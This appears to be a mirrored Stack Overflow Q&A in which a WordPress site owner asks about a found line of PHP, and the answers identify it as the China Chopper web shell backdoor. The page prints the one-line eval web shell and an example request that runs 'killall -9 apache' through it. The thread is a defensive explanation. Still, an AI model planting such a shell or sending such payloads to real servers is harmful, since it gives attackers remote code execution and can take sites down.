Found <?php @eval($_POST['pass']);?> code in wordpress site

吃可爱长大的小学妹 提交于 2019-12-10 19:43:30

问题


I found this code in one of my wordpress plugin site. I guess it can be used with malicious intent but what exactly it does and can I find out if it calls some other actions that I should be aware of?


回答1:


This PHP script belongs to China Chopper Hacking Kit.

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html




回答2:


Yes, it is very bad. I can't imagine any situation where this code could exist as the part of a harmless software.

This code essentially allows to run any php code given by the pass get parameter. For example, calling this php as http://yoursite/your.php?pass=system("killall -9 apache"); will shot down your webserver. But it is usable for anything (including overwriting / extending your existing scripts to save the site passwords in a temporary file. And later to get this temporary file back).

It is probably a backdoor, and probably not the only one. Your site needs a deep security check.



来源:https://stackoverflow.com/questions/32672027/found-php-eval-postpass-code-in-wordpress-site

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!